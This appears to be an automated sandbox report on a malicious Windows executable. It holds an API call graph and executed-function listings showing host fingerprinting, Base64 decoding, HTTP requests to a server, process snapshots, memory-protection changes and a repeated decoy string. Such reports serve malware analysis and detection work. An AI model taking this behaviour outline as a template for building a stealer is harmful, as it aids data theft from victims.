GetProcAddress GetProcAddress 27309->27310 27311 415ca3 27309->27311 27310->27311 27312 401590 27311->27312 27587 401670 27312->27587 27315 41a7a0 lstrcpy 27316 4015b5 27315->27316 27317 41a7a0 lstrcpy 27316->27317 27318 4015c7 27317->27318 27319 41a7a0 lstrcpy 27318->27319 27320 4015d9 27319->27320 27321 41a7a0 lstrcpy 27320->27321 27322 401663 27321->27322 27323 415510 27322->27323 27324 415521 27323->27324 27325 41a820 2 API calls 27324->27325 27326 41552e 27325->27326 27327 41a820 2 API calls 27326->27327 27328 41553b 27327->27328 27329 41a820 2 API calls 27328->27329 27330 415548 27329->27330 27331 41a740 lstrcpy 27330->27331 27332 415555 27331->27332 27333 41a740 lstrcpy 27332->27333 27334 415562 27333->27334 27335 41a740 lstrcpy 27334->27335 27336 41556f 27335->27336 27337 41a740 lstrcpy 27336->27337 27377 41557c 27337->27377 27338 41a740 lstrcpy 27338->27377 27339 415643 StrCmpCA 27339->27377 27340 4156a0 StrCmpCA 27341 4157dc 27340->27341 27340->27377 27342 41a8a0 lstrcpy 27341->27342 27343 4157e8 27342->27343 27345 41a820 2 API calls 27343->27345 27344 41a820 lstrlenA lstrcpy 27344->27377 27346 4157f6 27345->27346 27349 41a820 2 API calls 27346->27349 27347 415856 StrCmpCA 27348 415991 27347->27348 27347->27377 27350 41a8a0 lstrcpy 27348->27350 27351 415805 27349->27351 27353 41599d 27350->27353 27354 401670 lstrcpy 27351->27354 27352 401590 lstrcpy 27352->27377 27355 41a820 2 API calls 27353->27355 27374 415811 27354->27374 27358 4159ab 27355->27358 27356 415a0b StrCmpCA 27359 415a16 Sleep 27356->27359 27360 415a28 27356->27360 27357 4152c0 29 API calls 27357->27377 27361 41a820 2 API calls 27358->27361 27359->27377 27362 41a8a0 lstrcpy 27360->27362 27363 4159ba 27361->27363 27365 415a34 27362->27365 27364 401670 lstrcpy 27363->27364 27364->27374 27366 41a820 2 API calls 27365->27366 27367 415a43 27366->27367 27368 41a820 2 API calls 27367->27368 27369 415a52 27368->27369 27372 401670 lstrcpy 27369->27372 27370 41a8a0 lstrcpy 27370->27377 27371 41578a StrCmpCA 27371->27377 27372->27374 27373 41a7a0 lstrcpy 27373->27377 27374->26431 27375 41593f StrCmpCA 27375->27377 27376 4151f0 23 API calls 27376->27377 27377->27338 27377->27339 27377->27340 27377->27344 27377->27347 27377->27352 27377->27356 27377->27357 27377->27370 27377->27371 27377->27373 27377->27375 27377->27376 27379 417553 GetVolumeInformationA 27378->27379 27380 41754c 27378->27380 27381 417591 27379->27381 27380->27379 27382 4175fc GetProcessHeap HeapAlloc 27381->27382 27383 417619 27382->27383 27384 417628 wsprintfA 27382->27384 27385 41a740 lstrcpy 27383->27385 27386 41a740 lstrcpy 27384->27386 27387 415da7 27385->27387 27386->27387 27387->26452 27389 41a7a0 lstrcpy 27388->27389 27390 404899 27389->27390 27596 4047b0 27390->27596 27392 4048a5 27393 41a740 lstrcpy 27392->27393 27394 4048d7 27393->27394 27395 41a740 lstrcpy 27394->27395 27396 4048e4 27395->27396 27397 41a740 lstrcpy 27396->27397 27398 4048f1 27397->27398 27399 41a740 lstrcpy 27398->27399 27400 4048fe 27399->27400 27401 41a740 lstrcpy 27400->27401 27402 40490b InternetOpenA StrCmpCA 27401->27402 27403 404944 27402->27403 27404 404955 27403->27404 27405 404ecb InternetCloseHandle 27403->27405 27609 418b60 GetSystemTime lstrcpy lstrcpy 27404->27609 27407 404ee8 27405->27407 27604 409ac0 CryptStringToBinaryA 27407->27604 27408 404963 27610 41a920 lstrcpy lstrcpy lstrcatA 27408->27610 27412 404976 27413 41a8a0 lstrcpy 27412->27413 27418 40497f 27413->27418 27414 41a820 2 API calls 27415 404f05 27414->27415 27416 41a9b0 4 API calls 27415->27416 27419 404f1b 27416->27419 27417 404f27 codecvt 27420 41a7a0 lstrcpy 27417->27420 27422 41a9b0 4 API calls 27418->27422 27421 41a8a0 lstrcpy 27419->27421 27433 404f57 27420->27433 27421->27417 27423 4049a9 27422->27423 27424 41a8a0 lstrcpy 27423->27424 27425 4049b2 27424->27425 27426 41a9b0 4 API calls 27425->27426 27427 4049d1 27426->27427 27428 41a8a0 lstrcpy 27427->27428 27429 4049da 27428->27429 27611 41a920 lstrcpy lstrcpy lstrcatA 27429->27611 27431 4049f8 27432 41a8a0 lstrcpy 27431->27432 27434 404a01 27432->27434 27433->26455 27435 41a9b0 4 API calls 27434->27435 27436 404a20 27435->27436 27437 41a8a0 lstrcpy 27436->27437 27438 404a29 27437->27438 27439 41a9b0 4 API calls 27438->27439 27440 404a48 27439->27440 27441 41a8a0 lstrcpy 27440->27441 27442 404a51 27441->27442 27443 41a9b0 4 API calls 27442->27443 27444 404a7d 27443->27444 27612 41a920 lstrcpy lstrcpy lstrcatA 27444->27612 27446 404a84 27447 41a8a0 lstrcpy 27446->27447 27448 404a8d 27447->27448 27449 404aa3 InternetConnectA 27448->27449 27449->27405 27450 404ad3 HttpOpenRequestA 27449->27450 27452 404b28 27450->27452 27453 404ebe InternetCloseHandle 27450->27453 27454 41a9b0 4 API calls 27452->27454 27453->27405 27455 404b3c 27454->27455 27456 41a8a0 lstrcpy 27455->27456 27457 404b45 27456->27457 27613 41a920 lstrcpy lstrcpy lstrcatA 27457->27613 27459 404b63 27460 41a8a0 lstrcpy 27459->27460 27461 404b6c 27460->27461 27462 41a9b0 4 API calls 27461->27462 27463 404b8b 27462->27463 27464 41a8a0 lstrcpy 27463->27464 27465 404b94 27464->27465 27466 41a9b0 4 API calls 27465->27466 27467 404bb5 27466->27467 27468 41a8a0 lstrcpy 27467->27468 27469 404bbe 27468->27469 27470 41a9b0 4 API calls 27469->27470 27471 404bde 27470->27471 27472 41a8a0 lstrcpy 27471->27472 27473 404be7 27472->27473 27474 41a9b0 4 API calls 27473->27474 27475 404c06 27474->27475 27476 41a8a0 lstrcpy 27475->27476 27477 404c0f 27476->27477 27614 41a920 lstrcpy lstrcpy lstrcatA 27477->27614 27479 404c2d 27480 41a8a0 lstrcpy 27479->27480 27481 404c36 27480->27481 27482 41a9b0 4 API calls 27481->27482 27483 404c55 27482->27483 27484 41a8a0 lstrcpy 27483->27484 27485 404c5e 27484->27485 27486 41a9b0 4 API calls 27485->27486 27487 404c7d 27486->27487 27488 41a8a0 lstrcpy 27487->27488 27489 404c86 27488->27489 27615 41a920 lstrcpy lstrcpy lstrcatA 27489->27615 27491 404ca4 27492 41a8a0 lstrcpy 27491->27492 27493 404cad 27492->27493 27494 41a9b0 4 API calls 27493->27494 27495 404ccc 27494->27495 27496 41a8a0 lstrcpy 27495->27496 27497 404cd5 27496->27497 27498 41a9b0 4 API calls 27497->27498 27499 404cf6 27498->27499 27500 41a8a0 lstrcpy 27499->27500 27501 404cff 27500->27501 27502 41a9b0 4 API calls 27501->27502 27503 404d1f 27502->27503 27504 41a8a0 lstrcpy 27503->27504 27505 404d28 27504->27505 27506 41a9b0 4 API calls 27505->27506 27507 404d47 27506->27507 27508 41a8a0 lstrcpy 27507->27508 27509 404d50 27508->27509 27616 41a920 lstrcpy lstrcpy lstrcatA 27509->27616 27511 404d6e 27512 41a8a0 lstrcpy 27511->27512 27513 404d77 27512->27513 27514 41a740 lstrcpy 27513->27514 27515 404d92 27514->27515 27617 41a920 lstrcpy lstrcpy lstrcatA 27515->27617 27517 404db3 27618 41a920 lstrcpy lstrcpy lstrcatA 27517->27618 27519 404dba 27520 41a8a0 lstrcpy 27519->27520 27521 404dc6 27520->27521 27522 404de7 lstrlenA 27521->27522 27523 404dfa 27522->27523 27524 404e03 lstrlenA 27523->27524 27619 41aad0 27524->27619 27526 404e13 HttpSendRequestA 27527 404e32 InternetReadFile 27526->27527 27528 404e67 InternetCloseHandle 27527->27528 27533 404e5e 27527->27533 27531 41a800 27528->27531 27530 41a9b0 4 API calls 27530->27533 27531->27453 27532 41a8a0 lstrcpy 27532->27533 27533->27527 27533->27528 27533->27530 27533->27532 27624 41aad0 27534->27624 27536 4117c4 StrCmpCA 27537 4117d7 27536->27537 27538 4117cf ExitProcess 27536->27538 27539 4117e7 strtok_s 27537->27539 27542 4117f4 27539->27542 27540 4119c2 27540->26457 27541 41199e strtok_s 27541->27542 27542->27540 27542->27541 27543 4118ad StrCmpCA 27542->27543 27544 4118cf StrCmpCA 27542->27544 27545 4118f1 StrCmpCA 27542->27545 27546 411951 StrCmpCA 27542->27546 27547 411970 StrCmpCA 27542->27547 27548 411913 StrCmpCA 27542->27548 27549 411932 StrCmpCA 27542->27549 27550 41185d StrCmpCA 27542->27550 27551 41187f StrCmpCA 27542->27551 27552 41a820 2 API calls 27542->27552 27553 41a820 lstrlenA lstrcpy 27542->27553 27543->27542 27544->27542 27545->27542 27546->27542 27547->27542 27548->27542 27549->27542 27550->27542 27551->27542 27552->27541 27553->27542 27554->26463 27555->26465 27556->26471 27557->26473 27558->26479 27559->26481 27560->26485 27561->26489 27562->26493 27563->26499 27564->26501 27565->26505 27566->26519 27567->26522 27568->26523 27569->26518 27570->26523 27571->26538 27572->26525 27573->26529 27574->26530 27575->26535 27576->26540 27577->26542 27578->26549 27579->26555 27580->26576 27581->26580 27582->26579 27583->26575 27584->26579 27585->26589 27588 41a7a0 lstrcpy 27587->27588 27589 401683 27588->27589 27590 41a7a0 lstrcpy 27589->27590 27591 401695 27590->27591 27592 41a7a0 lstrcpy 27591->27592 27593 4016a7 27592->27593 27594 41a7a0 lstrcpy 27593->27594 27595 4015a3 27594->27595 27595->27315 27620 401030 27596->27620 27600 404838 lstrlenA 27623 41aad0 27600->27623 27602 404848 InternetCrackUrlA 27603 404867 27602->27603 27603->27392 27605 409af9 LocalAlloc 27604->27605 27606 404eee 27604->27606 27605->27606 27607 409b14 CryptStringToBinaryA 27605->27607 27606->27414 27606->27417 27607->27606 27608 409b39 LocalFree 27607->27608 27608->27606 27609->27408 27610->27412 27611->27431 27612->27446 27613->27459 27614->27479 27615->27491 27616->27511 27617->27517 27618->27519 27619->27526 27621 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27620->27621 27622 41aad0 27621->27622 27622->27600 27623->27602 27624->27536 27750 416ab1 902 API calls 27719 4069f3 7 API calls 27692 22e0297 131 API calls 27693 22eae93 43 API calls ctype 27752 41cafe 219 API calls 5 library calls 27754 22ecce9 162 API calls ___crtGetStringTypeA 27788 22e19e7 StrCmpCA ExitProcess strtok_s strtok_s 27789 22e35e4 9 API calls 26196 401190 26203 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26196->26203 26198 40119e 26199 4011cc 26198->26199 26205 417850 GetProcessHeap HeapAlloc GetUserNameA 26198->26205 26201 4011b7 26201->26199 26202 4011c4 ExitProcess 26201->26202 26204 417939 26203->26204 26204->26198 26206 4178c3 26205->26206 26206->26201 27755 22e30f9 7 API calls 27756 22df8f1 32 API calls 27757 41ce9f 69 API calls __amsg_exit 27696 4088a4 RaiseException task __CxxThrowException@8 27697 4180a5 GetProcessHeap HeapFree 27721 22e13c7 strtok_s strtok_s 27762 22e3823 8 API calls 27723 41b9b0 RtlUnwind 27652 849a7e 27653 849a8d 27652->27653 27656 84a21e 27653->27656 27662 84a239 27656->27662 27657 84a242 CreateToolhelp32Snapshot 27658 84a25e Module32First 27657->27658 27657->27662 27659 84a26d 27658->27659 27661 849a96 27658->27661 27663 849edd 27659->27663 27662->27657 27662->27658 27664 849f08 27663->27664 27665 849f51 27664->27665 27666 849f19 VirtualAlloc 27664->27666 27665->27665 27666->27665 27764 22e30d0 9 API calls

                                                            Executed Functions

                                                            Function 004045C0 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114stringmemoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                                            • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                                            • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                                            • strlen.MSVCRT ref: 004046F0
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                                            Strings
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                            • API String ID: 2127927946-2218711628
                                                            • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                            • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                                                            • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                            • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E
                                                            Function 00417850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocNameProcessUser
                                                            • String ID:
                                                            • API String ID: 1206570057-0
                                                            • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                            • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                                            • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                            • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                                            Function 00401160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                            Download Yara Rule
                                                            APIs
